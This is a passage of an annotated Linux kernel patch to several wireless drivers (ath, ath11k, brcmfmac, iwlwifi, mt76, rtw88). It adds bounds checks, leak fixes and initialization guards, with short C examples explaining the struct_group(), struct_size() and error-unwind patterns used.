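Factoring the per-queue XDP registration and NAPI enable into virtnet_enable_queue_pair() buys virtnet_open() a symmetric unwind: when queue i fails, the "for (i--; i >= 0; i--)" loop disables exactly the queues already brought up, in reverse order. The pattern in isolation, with demo_* names as placeholders:

struct demo_dev { int nr_queues; };

int demo_enable_queue(struct demo_dev *d, int i);	/* hypothetical */
void demo_disable_queue(struct demo_dev *d, int i);	/* hypothetical */

static int demo_open(struct demo_dev *d)
{
	int i, err;

	for (i = 0; i < d->nr_queues; i++) {
		err = demo_enable_queue(d, i);
		if (err < 0)
			goto err_unwind;
	}
	return 0;

err_unwind:
	for (i--; i >= 0; i--)		/* only what was actually enabled */
		demo_disable_queue(d, i);
	return err;
}
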
+diff --git a/drivers/net/wireless/ath/ath.h b/drivers/net/wireless/ath/ath.h
+index f083fb9038c36..f02a308a9ffc5 100644
+--- a/drivers/net/wireless/ath/ath.h
++++ b/drivers/net/wireless/ath/ath.h
+@@ -96,11 +96,13 @@ struct ath_keyval {
+ 	u8 kv_type;
+ 	u8 kv_pad;
+ 	u16 kv_len;
+-	u8 kv_val[16]; /* TK */
+-	u8 kv_mic[8]; /* Michael MIC key */
+-	u8 kv_txmic[8]; /* Michael MIC TX key (used only if the hardware
+-			 * supports both MIC keys in the same key cache entry;
+-			 * in that case, kv_mic is the RX key) */
++	struct_group(kv_values,
++		u8 kv_val[16]; /* TK */
++		u8 kv_mic[8]; /* Michael MIC key */
++		u8 kv_txmic[8]; /* Michael MIC TX key (used only if the hardware
++				 * supports both MIC keys in the same key cache entry;
++				 * in that case, kv_mic is the RX key) */
++	);
+ };
+ 
+ enum ath_cipher {
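
Wrapping kv_val/kv_mic/kv_txmic in struct_group() matters because ath_key_config() copies up to keylen bytes starting at the first member, intentionally spilling into the MIC keys; FORTIFY_SOURCE flags such a cross-member memcpy() unless the destination is a named group spanning all of them, which is why key.c now copies into &hk.kv_values. A toy version of the pattern:

#include <linux/minmax.h>
#include <linux/stddef.h>	/* struct_group() */
#include <linux/string.h>
#include <linux/types.h>

struct demo_key {
	u16 len;
	struct_group(values,	/* named target spanning three members */
		u8 val[16];
		u8 mic[8];
		u8 txmic[8];
	);
};

static void demo_set_key(struct demo_key *k, const u8 *src, u16 len)
{
	k->len = len;
	memcpy(&k->values, src, min_t(size_t, len, sizeof(k->values)));
}
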
+diff --git a/drivers/net/wireless/ath/ath11k/dp.c b/drivers/net/wireless/ath/ath11k/dp.c
+index f5156a7fbdd7a..d070bcb3fe247 100644
+--- a/drivers/net/wireless/ath/ath11k/dp.c
++++ b/drivers/net/wireless/ath/ath11k/dp.c
+@@ -36,6 +36,7 @@ void ath11k_dp_peer_cleanup(struct ath11k *ar, int vdev_id, const u8 *addr)
+ 	}
+ 
+ 	ath11k_peer_rx_tid_cleanup(ar, peer);
++	peer->dp_setup_done = false;
+ 	crypto_free_shash(peer->tfm_mmic);
+ 	spin_unlock_bh(&ab->base_lock);
+ }
+@@ -72,7 +73,8 @@ int ath11k_dp_peer_setup(struct ath11k *ar, int vdev_id, const u8 *addr)
+ 	ret = ath11k_peer_rx_frag_setup(ar, addr, vdev_id);
+ 	if (ret) {
+ 		ath11k_warn(ab, "failed to setup rx defrag context\n");
+-		return ret;
++		tid--;
++		goto peer_clean;
+ 	}
+ 
+ 	/* TODO: Setup other peer specific resource used in data path */
+diff --git a/drivers/net/wireless/ath/ath11k/dp_rx.c b/drivers/net/wireless/ath/ath11k/dp_rx.c
+index e964e1b722871..38be646bc0214 100644
+--- a/drivers/net/wireless/ath/ath11k/dp_rx.c
++++ b/drivers/net/wireless/ath/ath11k/dp_rx.c
+@@ -389,10 +389,10 @@ int ath11k_dp_rxbufs_replenish(struct ath11k_base *ab, int mac_id,
+ 			goto fail_free_skb;
+ 
+ 		spin_lock_bh(&rx_ring->idr_lock);
+-		buf_id = idr_alloc(&rx_ring->bufs_idr, skb, 0,
+-				   rx_ring->bufs_max * 3, GFP_ATOMIC);
++		buf_id = idr_alloc(&rx_ring->bufs_idr, skb, 1,
++				   (rx_ring->bufs_max * 3) + 1, GFP_ATOMIC);
+ 		spin_unlock_bh(&rx_ring->idr_lock);
+-		if (buf_id < 0)
++		if (buf_id <= 0)
+ 			goto fail_dma_unmap;
+ 
+ 		desc = ath11k_hal_srng_src_get_next_entry(ab, srng);
+@@ -2665,6 +2665,9 @@ try_again:
+ 				   cookie);
+ 		mac_id = FIELD_GET(DP_RXDMA_BUF_COOKIE_PDEV_ID, cookie);
+ 
++		if (unlikely(buf_id == 0))
++			continue;
++
+ 		ar = ab->pdevs[mac_id].ar;
+ 		rx_ring = &ar->dp.rx_refill_buf_ring;
+ 		spin_lock_bh(&rx_ring->idr_lock);
+@@ -3138,6 +3141,7 @@ int ath11k_peer_rx_frag_setup(struct ath11k *ar, const u8 *peer_mac, int vdev_id
+ 	}
+ 
+ 	peer->tfm_mmic = tfm;
++	peer->dp_setup_done = true;
+ 	spin_unlock_bh(&ab->base_lock);
+ 
+ 	return 0;
+@@ -3583,6 +3587,13 @@ static int ath11k_dp_rx_frag_h_mpdu(struct ath11k *ar,
+ 		ret = -ENOENT;
+ 		goto out_unlock;
+ 	}
++	if (!peer->dp_setup_done) {
++		ath11k_warn(ab, "The peer %pM [%d] has uninitialized datapath\n",
++			    peer->addr, peer_id);
++		ret = -ENOENT;
++		goto out_unlock;
++	}
++
+ 	rx_tid = &peer->rx_tid[tid];
+ 
+ 	if ((!skb_queue_empty(&rx_tid->rx_frags) && seqno != rx_tid->cur_sn) ||
+diff --git a/drivers/net/wireless/ath/ath11k/peer.h b/drivers/net/wireless/ath/ath11k/peer.h
+index 6dd17bafe3a0c..9bd385d0a38c9 100644
+--- a/drivers/net/wireless/ath/ath11k/peer.h
++++ b/drivers/net/wireless/ath/ath11k/peer.h
+@@ -35,6 +35,7 @@ struct ath11k_peer {
+ 	u16 sec_type;
+ 	u16 sec_type_grp;
+ 	bool is_authorized;
++	bool dp_setup_done;
+ };
+ 
+ void ath11k_peer_unmap_event(struct ath11k_base *ab, u16 peer_id);
+diff --git a/drivers/net/wireless/ath/key.c b/drivers/net/wireless/ath/key.c
+index 61b59a804e308..b7b61d4f02bae 100644
+--- a/drivers/net/wireless/ath/key.c
++++ b/drivers/net/wireless/ath/key.c
+@@ -503,7 +503,7 @@ int ath_key_config(struct ath_common *common,
+ 
+ 	hk.kv_len = key->keylen;
+ 	if (key->keylen)
+-		memcpy(hk.kv_val, key->key, key->keylen);
++		memcpy(&hk.kv_values, key->key, key->keylen);
+ 
+ 	if (!(key->flags & IEEE80211_KEY_FLAG_PAIRWISE)) {
+ 		switch (vif->type) {
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+index 2cc913acfc2d7..ad5a8d61d9385 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/cfg80211.c
+@@ -1351,13 +1351,14 @@ static int brcmf_set_pmk(struct brcmf_if *ifp, const u8 *pmk_data, u16 pmk_len)
+ {
+ 	struct brcmf_pub *drvr = ifp->drvr;
+ 	struct brcmf_wsec_pmk_le pmk;
+-	int i, err;
++	int err;
++
++	memset(&pmk, 0, sizeof(pmk));
+ 
+-	/* convert to firmware key format */
+-	pmk.key_len = cpu_to_le16(pmk_len << 1);
+-	pmk.flags = cpu_to_le16(BRCMF_WSEC_PASSPHRASE);
+-	for (i = 0; i < pmk_len; i++)
+-		snprintf(&pmk.key[2 * i], 3, "%02x", pmk_data[i]);
++	/* pass pmk directly */
++	pmk.key_len = cpu_to_le16(pmk_len);
++	pmk.flags = cpu_to_le16(0);
++	memcpy(pmk.key, pmk_data, pmk_len);
+ 
+ 	/* store psk in firmware */
+ 	err = brcmf_fil_cmd_data_set(ifp, BRCMF_C_SET_WSEC_PMK,
+diff --git a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+index 067ea019b110a..3b1277a8bd617 100644
+--- a/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
++++ b/drivers/net/wireless/broadcom/brcm80211/brcmfmac/pcie.c
+@@ -13,6 +13,7 @@
+ #include <linux/bcma/bcma.h>
+ #include <linux/sched.h>
+ #include <linux/io.h>
++#include <linux/random.h>
+ #include <asm/unaligned.h>
+ 
+ #include <soc.h>
+@@ -1631,6 +1632,13 @@ brcmf_pcie_init_share_ram_info(struct brcmf_pciedev_info *devinfo,
+ 	return 0;
+ }
+ 
++struct brcmf_random_seed_footer {
++	__le32 length;
++	__le32 magic;
++};
++
++#define BRCMF_RANDOM_SEED_MAGIC		0xfeedc0de
++#define BRCMF_RANDOM_SEED_LENGTH	0x100
+ 
+ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 					const struct firmware *fw, void *nvram,
+@@ -1667,6 +1675,30 @@ static int brcmf_pcie_download_fw_nvram(struct brcmf_pciedev_info *devinfo,
+ 			  nvram_len;
+ 		memcpy_toio(devinfo->tcm + address, nvram, nvram_len);
+ 		brcmf_fw_nvram_free(nvram);
++
++		if (devinfo->otp.valid) {
++			size_t rand_len = BRCMF_RANDOM_SEED_LENGTH;
++			struct brcmf_random_seed_footer footer = {
++				.length = cpu_to_le32(rand_len),
++				.magic = cpu_to_le32(BRCMF_RANDOM_SEED_MAGIC),
++			};
++			void *randbuf;
++
++			/* Some Apple chips/firmwares expect a buffer of random
++			 * data to be present before NVRAM
++			 */
++			brcmf_dbg(PCIE, "Download random seed\n");
++
++			address -= sizeof(footer);
++			memcpy_toio(devinfo->tcm + address, &footer,
++				    sizeof(footer));
++
++			address -= rand_len;
++			randbuf = kzalloc(rand_len, GFP_KERNEL);
++			get_random_bytes(randbuf, rand_len);
++			memcpy_toio(devinfo->tcm + address, randbuf, rand_len);
++			kfree(randbuf);
++		}
+ 	} else {
+ 		brcmf_dbg(PCIE, "No matching NVRAM file found %s\n",
+ 			  devinfo->nvram_name);
+diff --git a/drivers/net/wireless/intel/iwlwifi/dvm/sta.c b/drivers/net/wireless/intel/iwlwifi/dvm/sta.c
+index cef43cf80620a..8b01ab986cb13 100644
+--- a/drivers/net/wireless/intel/iwlwifi/dvm/sta.c
++++ b/drivers/net/wireless/intel/iwlwifi/dvm/sta.c
+@@ -1081,6 +1081,7 @@ static int iwlagn_send_sta_key(struct iwl_priv *priv,
+ {
+ 	__le16 key_flags;
+ 	struct iwl_addsta_cmd sta_cmd;
++	size_t to_copy;
+ 	int i;
+ 
+ 	spin_lock_bh(&priv->sta_lock);
+@@ -1100,7 +1101,9 @@ static int iwlagn_send_sta_key(struct iwl_priv *priv,
+ 		sta_cmd.key.tkip_rx_tsc_byte2 = tkip_iv32;
+ 		for (i = 0; i < 5; i++)
+ 			sta_cmd.key.tkip_rx_ttak[i] = cpu_to_le16(tkip_p1k[i]);
+-		memcpy(sta_cmd.key.key, keyconf->key, keyconf->keylen);
++		/* keyconf may contain MIC rx/tx keys which iwl does not use */
++		to_copy = min_t(size_t, sizeof(sta_cmd.key.key), keyconf->keylen);
++		memcpy(sta_cmd.key.key, keyconf->key, to_copy);
+ 		break;
+ 	case WLAN_CIPHER_SUITE_WEP104:
+ 		key_flags |= STA_KEY_FLG_KEY_SIZE_MSK;
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+index a02e5a67b7066..585e8cd2d332d 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/acpi.c
+@@ -38,7 +38,7 @@ static const struct dmi_system_id dmi_ppag_approved_list[] = {
+ 	},
+ 	{ .ident = "ASUS",
+ 	  .matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTek COMPUTER INC."),
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
+ 		},
+ 	},
+ 	{}
+diff --git a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+index 027360e63b926..3ef0b776b7727 100644
+--- a/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
++++ b/drivers/net/wireless/intel/iwlwifi/fw/dbg.c
+@@ -1664,14 +1664,10 @@ static __le32 iwl_get_mon_reg(struct iwl_fw_runtime *fwrt, u32 alloc_id,
+ }
+ 
+ static void *
+-iwl_dump_ini_mon_fill_header(struct iwl_fw_runtime *fwrt,
+-			     struct iwl_dump_ini_region_data *reg_data,
++iwl_dump_ini_mon_fill_header(struct iwl_fw_runtime *fwrt, u32 alloc_id,
+ 			     struct iwl_fw_ini_monitor_dump *data,
+ 			     const struct iwl_fw_mon_regs *addrs)
+ {
+-	struct iwl_fw_ini_region_tlv *reg = (void *)reg_data->reg_tlv->data;
+-	u32 alloc_id = le32_to_cpu(reg->dram_alloc_id);
+-
+ 	if (!iwl_trans_grab_nic_access(fwrt->trans)) {
+ 		IWL_ERR(fwrt, "Failed to get monitor header\n");
+ 		return NULL;
+@@ -1702,8 +1698,10 @@ iwl_dump_ini_mon_dram_fill_header(struct iwl_fw_runtime *fwrt,
+ 				  void *data, u32 data_len)
+ {
+ 	struct iwl_fw_ini_monitor_dump *mon_dump = (void *)data;
++	struct iwl_fw_ini_region_tlv *reg = (void *)reg_data->reg_tlv->data;
++	u32 alloc_id = le32_to_cpu(reg->dram_alloc_id);
+ 
+-	return iwl_dump_ini_mon_fill_header(fwrt, reg_data, mon_dump,
++	return iwl_dump_ini_mon_fill_header(fwrt, alloc_id, mon_dump,
+ 					    &fwrt->trans->cfg->mon_dram_regs);
+ }
+ 
+@@ -1713,8 +1711,10 @@ iwl_dump_ini_mon_smem_fill_header(struct iwl_fw_runtime *fwrt,
+ 				  void *data, u32 data_len)
+ {
+ 	struct iwl_fw_ini_monitor_dump *mon_dump = (void *)data;
++	struct iwl_fw_ini_region_tlv *reg = (void *)reg_data->reg_tlv->data;
++	u32 alloc_id = le32_to_cpu(reg->internal_buffer.alloc_id);
+ 
+-	return iwl_dump_ini_mon_fill_header(fwrt, reg_data, mon_dump,
++	return iwl_dump_ini_mon_fill_header(fwrt, alloc_id, mon_dump,
+ 					    &fwrt->trans->cfg->mon_smem_regs);
+ }
+ 
+@@ -1725,7 +1725,10 @@ iwl_dump_ini_mon_dbgi_fill_header(struct iwl_fw_runtime *fwrt,
+ {
+ 	struct iwl_fw_ini_monitor_dump *mon_dump = (void *)data;
+ 
+-	return iwl_dump_ini_mon_fill_header(fwrt, reg_data, mon_dump,
++	return iwl_dump_ini_mon_fill_header(fwrt,
++					    /* no offset calculation later */
++					    IWL_FW_INI_ALLOCATION_ID_DBGC1,
++					    mon_dump,
+ 					    &fwrt->trans->cfg->mon_dbgi_regs);
+ }
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+index 5de34edc51fe9..887d0789c96c3 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/fw.c
+@@ -1055,7 +1055,7 @@ static const struct dmi_system_id dmi_tas_approved_list[] = {
+ 	},
+ 		{ .ident = "LENOVO",
+ 	  .matches = {
+-			DMI_MATCH(DMI_SYS_VENDOR, "Lenovo"),
++			DMI_MATCH(DMI_SYS_VENDOR, "LENOVO"),
+ 		},
+ 	},
+ 	{ .ident = "DELL",
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+index a841268e0709f..801098c5183b6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/mac80211.c
+@@ -3445,7 +3445,7 @@ static int __iwl_mvm_mac_set_key(struct ieee80211_hw *hw,
+ 	struct iwl_mvm_vif *mvmvif = iwl_mvm_vif_from_mac80211(vif);
+ 	struct iwl_mvm *mvm = IWL_MAC80211_GET_MVM(hw);
+ 	struct iwl_mvm_sta *mvmsta = NULL;
+-	struct iwl_mvm_key_pn *ptk_pn;
++	struct iwl_mvm_key_pn *ptk_pn = NULL;
+ 	int keyidx = key->keyidx;
+ 	int ret, i;
+ 	u8 key_offset;
+@@ -3590,6 +3590,10 @@ static int __iwl_mvm_mac_set_key(struct ieee80211_hw *hw,
+ 		if (ret) {
+ 			IWL_WARN(mvm, "set key failed\n");
+ 			key->hw_key_idx = STA_KEY_IDX_INVALID;
++			if (ptk_pn) {
++				RCU_INIT_POINTER(mvmsta->ptk_pn[keyidx], NULL);
++				kfree(ptk_pn);
++			}
+ 			/*
+ 			 * can't add key for RX, but we don't need it
+ 			 * in the device for TX so still return 0,
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c b/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c
+index 6d18a1fd649b9..fdf60afb0f3f2 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/nvm.c
+@@ -445,6 +445,11 @@ iwl_mvm_update_mcc(struct iwl_mvm *mvm, const char *alpha2,
+ 		struct iwl_mcc_update_resp *mcc_resp = (void *)pkt->data;
+ 
+ 		n_channels =  __le32_to_cpu(mcc_resp->n_channels);
++		if (iwl_rx_packet_payload_len(pkt) !=
++		    struct_size(mcc_resp, channels, n_channels)) {
++			resp_cp = ERR_PTR(-EINVAL);
++			goto exit;
++		}
+ 		resp_len = sizeof(struct iwl_mcc_update_resp) +
+ 			   n_channels * sizeof(__le32);
+ 		resp_cp = kmemdup(mcc_resp, resp_len, GFP_KERNEL);
+@@ -456,6 +461,11 @@ iwl_mvm_update_mcc(struct iwl_mvm *mvm, const char *alpha2,
+ 		struct iwl_mcc_update_resp_v3 *mcc_resp_v3 = (void *)pkt->data;
+ 
+ 		n_channels =  __le32_to_cpu(mcc_resp_v3->n_channels);
++		if (iwl_rx_packet_payload_len(pkt) !=
++		    struct_size(mcc_resp_v3, channels, n_channels)) {
++			resp_cp = ERR_PTR(-EINVAL);
++			goto exit;
++		}
+ 		resp_len = sizeof(struct iwl_mcc_update_resp) +
+ 			   n_channels * sizeof(__le32);
+ 		resp_cp = kzalloc(resp_len, GFP_KERNEL);
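
The nvm.c hunks validate the firmware-supplied n_channels against the actual packet payload before the response is duplicated, using struct_size() to compute the expected flexible-array size without wrapping. The shape of the check, reduced to its essentials (demo_resp mimics a header followed by a flexible array of __le32 channels):

#include <linux/overflow.h>
#include <linux/types.h>

struct demo_resp {
	__le32 n_channels;
	__le32 channels[];
};

static bool demo_resp_len_ok(const struct demo_resp *r, size_t payload_len)
{
	u32 n = le32_to_cpu(r->n_channels);

	/* struct_size() saturates instead of wrapping on overflow, so a
	 * hostile n cannot make the comparison pass with a short buffer.
	 */
	return payload_len == struct_size(r, channels, n);
}
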
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+index 091225894037c..02c2a06301076 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/rxmq.c
+@@ -1975,7 +1975,7 @@ void iwl_mvm_rx_mpdu_mq(struct iwl_mvm *mvm, struct napi_struct *napi,
+ 				RCU_INIT_POINTER(mvm->csa_tx_blocked_vif, NULL);
+ 				/* Unblock BCAST / MCAST station */
+ 				iwl_mvm_modify_all_sta_disable_tx(mvm, mvmvif, false);
+-				cancel_delayed_work_sync(&mvm->cs_tx_unblock_dwork);
++				cancel_delayed_work(&mvm->cs_tx_unblock_dwork);
+ 			}
+ 		}
+ 
+diff --git a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+index ba944175546d4..542cfcad6e0e6 100644
+--- a/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
++++ b/drivers/net/wireless/intel/iwlwifi/mvm/tx.c
+@@ -788,10 +788,11 @@ unsigned int iwl_mvm_max_amsdu_size(struct iwl_mvm *mvm,
+ 				    struct ieee80211_sta *sta, unsigned int tid)
+ {
+ 	struct iwl_mvm_sta *mvmsta = iwl_mvm_sta_from_mac80211(sta);
+-	enum nl80211_band band = mvmsta->vif->bss_conf.chandef.chan->band;
+ 	u8 ac = tid_to_mac80211_ac[tid];
++	enum nl80211_band band;
+ 	unsigned int txf;
+-	int lmac = iwl_mvm_get_lmac_id(mvm->fw, band);
++	unsigned int val;
++	int lmac;
+ 
+ 	/* For HE redirect to trigger based fifos */
+ 	if (sta->deflink.he_cap.has_he && !WARN_ON(!iwl_mvm_has_new_tx_api(mvm)))
+@@ -805,7 +806,37 @@ unsigned int iwl_mvm_max_amsdu_size(struct iwl_mvm *mvm,
+ 	 * We also want to have the start of the next packet inside the
+ 	 * fifo to be able to send bursts.
+ 	 */
+-	return min_t(unsigned int, mvmsta->max_amsdu_len,
++	val = mvmsta->max_amsdu_len;
++
++	if (hweight16(sta->valid_links) <= 1) {
++		if (sta->valid_links) {
++			struct ieee80211_bss_conf *link_conf;
++			unsigned int link = ffs(sta->valid_links) - 1;
++
++			rcu_read_lock();
++			link_conf = rcu_dereference(mvmsta->vif->link_conf[link]);
++			if (WARN_ON(!link_conf))
++				band = NL80211_BAND_2GHZ;
++			else
++				band = link_conf->chandef.chan->band;
++			rcu_read_unlock();
++		} else {
++			band = mvmsta->vif->bss_conf.chandef.chan->band;
++		}
++
++		lmac = iwl_mvm_get_lmac_id(mvm->fw, band);
++	} else if (fw_has_capa(&mvm->fw->ucode_capa,
++			       IWL_UCODE_TLV_CAPA_CDB_SUPPORT)) {
++		/* for real MLO restrict to both LMACs if they exist */
++		lmac = IWL_LMAC_5G_INDEX;
++		val = min_t(unsigned int, val,
++			    mvm->fwrt.smem_cfg.lmac[lmac].txfifo_size[txf] - 256);
++		lmac = IWL_LMAC_24G_INDEX;
++	} else {
++		lmac = IWL_LMAC_24G_INDEX;
++	}
++
++	return min_t(unsigned int, val,
+ 		     mvm->fwrt.smem_cfg.lmac[lmac].txfifo_size[txf] - 256);
+ }
+ 
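
The rewritten lookup has to cope with MLO: with at most one valid link,
the band is read from that link's bss_conf under RCU, falling back to
2 GHz if the link has vanished; ffs(valid_links) - 1 turns the bitmap
into a link index. A condensed sketch of just that lookup:

    static enum nl80211_band link_band(struct ieee80211_vif *vif,
                                       u16 valid_links)
    {
            struct ieee80211_bss_conf *conf;
            unsigned int link = ffs(valid_links) - 1;
            enum nl80211_band band = NL80211_BAND_2GHZ;  /* fallback */

            rcu_read_lock();
            conf = rcu_dereference(vif->link_conf[link]);
            if (conf)
                    band = conf->chandef.chan->band;
            rcu_read_unlock();

            return band;
    }
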
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+index 85fadd1ef1ff3..03e8234d03520 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/drv.c
+@@ -504,6 +504,7 @@ static const struct pci_device_id iwl_hw_card_ids[] = {
+ 
+ /* Bz devices */
+ 	{IWL_PCI_DEVICE(0x2727, PCI_ANY_ID, iwl_bz_trans_cfg)},
++	{IWL_PCI_DEVICE(0x272b, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0xA840, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ 	{IWL_PCI_DEVICE(0x7740, PCI_ANY_ID, iwl_bz_trans_cfg)},
+ #endif /* CONFIG_IWLMVM */
+@@ -1685,6 +1686,9 @@ static void iwl_pci_remove(struct pci_dev *pdev)
+ {
+ 	struct iwl_trans *trans = pci_get_drvdata(pdev);
+ 
++	if (!trans)
++		return;
++
+ 	iwl_drv_stop(trans->drv);
+ 
+ 	iwl_trans_pcie_free(trans);
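
The NULL check covers probe failing before pci_set_drvdata() ran (or
after it was cleared): .remove can still be invoked and would otherwise
dereference NULL. The generic shape of the guard, with hypothetical
my_priv/my_teardown names:

    static void my_pci_remove(struct pci_dev *pdev)
    {
            struct my_priv *priv = pci_get_drvdata(pdev);

            if (!priv)
                    return;         /* probe never finished setting up */

            my_teardown(priv);      /* hypothetical */
    }
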
+diff --git a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+index 54f11f60f11c4..8e95225cdd605 100644
+--- a/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
++++ b/drivers/net/wireless/intel/iwlwifi/pcie/trans.c
+@@ -2852,7 +2852,7 @@ static bool iwl_write_to_user_buf(char __user *user_buf, ssize_t count,
+ 				  void *buf, ssize_t *size,
+ 				  ssize_t *bytes_copied)
+ {
+-	int buf_size_left = count - *bytes_copied;
++	ssize_t buf_size_left = count - *bytes_copied;
+ 
+ 	buf_size_left = buf_size_left - (buf_size_left % sizeof(u32));
+ 	if (*size > buf_size_left)
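
count and *bytes_copied are both ssize_t, so storing their difference in
an int truncates once more than INT_MAX bytes are outstanding, breaking
the size clamp below. A standalone user-space demonstration of the
truncation (not driver code):

    #include <stdio.h>
    #include <sys/types.h>

    int main(void)
    {
            ssize_t count = 3LL << 30;      /* 3 GiB requested */
            ssize_t copied = 0;

            int bad = count - copied;       /* 3 GiB > INT_MAX: wraps */
            ssize_t good = count - copied;

            printf("int: %d, ssize_t: %zd\n", bad, good);
            return 0;
    }
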
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h b/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h
+index f33171bcd3432..c3b692eac6f65 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac2_mac.h
+@@ -163,7 +163,7 @@ enum {
+ #define MT_TXS5_MPDU_TX_CNT		GENMASK(31, 23)
+ 
+ #define MT_TXS6_MPDU_FAIL_CNT		GENMASK(31, 23)
+-
++#define MT_TXS7_MPDU_RETRY_BYTE		GENMASK(22, 0)
+ #define MT_TXS7_MPDU_RETRY_CNT		GENMASK(31, 23)
+ 
+ /* RXD DW1 */
+diff --git a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+index 19f02b632a204..68511597599e3 100644
+--- a/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
++++ b/drivers/net/wireless/mediatek/mt76/mt76_connac_mac.c
+@@ -570,7 +570,8 @@ bool mt76_connac2_mac_fill_txs(struct mt76_dev *dev, struct mt76_wcid *wcid,
+ 	/* PPDU based reporting */
+ 	if (FIELD_GET(MT_TXS0_TXS_FORMAT, txs) > 1) {
+ 		stats->tx_bytes +=
+-			le32_get_bits(txs_data[5], MT_TXS5_MPDU_TX_BYTE);
++			le32_get_bits(txs_data[5], MT_TXS5_MPDU_TX_BYTE) -
++			le32_get_bits(txs_data[7], MT_TXS7_MPDU_RETRY_BYTE);
+ 		stats->tx_packets +=
+ 			le32_get_bits(txs_data[5], MT_TXS5_MPDU_TX_CNT);
+ 		stats->tx_failed +=
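
The accounting change subtracts retransmitted bytes (the new bitfield in
TXS word 7) from the per-PPDU byte counter, so tx_bytes reports delivered
payload rather than airtime including retries. le32_get_bits() is
shorthand for le32_to_cpu() plus FIELD_GET(); open-coded, the two
extractions read:

    u32 txs5 = le32_to_cpu(txs_data[5]);
    u32 txs7 = le32_to_cpu(txs_data[7]);

    stats->tx_bytes += FIELD_GET(MT_TXS5_MPDU_TX_BYTE, txs5) -
                       FIELD_GET(MT_TXS7_MPDU_RETRY_BYTE, txs7);
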
+diff --git a/drivers/net/wireless/realtek/rtw88/mac80211.c b/drivers/net/wireless/realtek/rtw88/mac80211.c
+index 07578ccc4bab3..62fb28f14c94d 100644
+--- a/drivers/net/wireless/realtek/rtw88/mac80211.c
++++ b/drivers/net/wireless/realtek/rtw88/mac80211.c
+@@ -891,7 +891,7 @@ static void rtw_ops_sta_rc_update(struct ieee80211_hw *hw,
+ 	struct rtw_sta_info *si = (struct rtw_sta_info *)sta->drv_priv;
+ 
+ 	if (changed & IEEE80211_RC_BW_CHANGED)
+-		rtw_update_sta_info(rtwdev, si, true);
++		ieee80211_queue_work(rtwdev->hw, &si->rc_work);
+ }
+ 
+ const struct ieee80211_ops rtw_ops = {
+diff --git a/drivers/net/wireless/realtek/rtw88/main.c b/drivers/net/wireless/realtek/rtw88/main.c
+index 67151dbf83842..8080ace5ed51e 100644
+--- a/drivers/net/wireless/realtek/rtw88/main.c
++++ b/drivers/net/wireless/realtek/rtw88/main.c
+@@ -296,6 +296,17 @@ static u8 rtw_acquire_macid(struct rtw_dev *rtwdev)
+ 	return mac_id;
+ }
+ 
++static void rtw_sta_rc_work(struct work_struct *work)
++{
++	struct rtw_sta_info *si = container_of(work, struct rtw_sta_info,
++					       rc_work);
++	struct rtw_dev *rtwdev = si->rtwdev;
++
++	mutex_lock(&rtwdev->mutex);
++	rtw_update_sta_info(rtwdev, si, true);
++	mutex_unlock(&rtwdev->mutex);
++}
++
+ int rtw_sta_add(struct rtw_dev *rtwdev, struct ieee80211_sta *sta,
+ 		struct ieee80211_vif *vif)
+ {
+@@ -306,12 +317,14 @@ int rtw_sta_add(struct rtw_dev *rtwdev, struct ieee80211_sta *sta,
+ 	if (si->mac_id >= RTW_MAX_MAC_ID_NUM)
+ 		return -ENOSPC;
+ 
++	si->rtwdev = rtwdev;
+ 	si->sta = sta;
+ 	si->vif = vif;
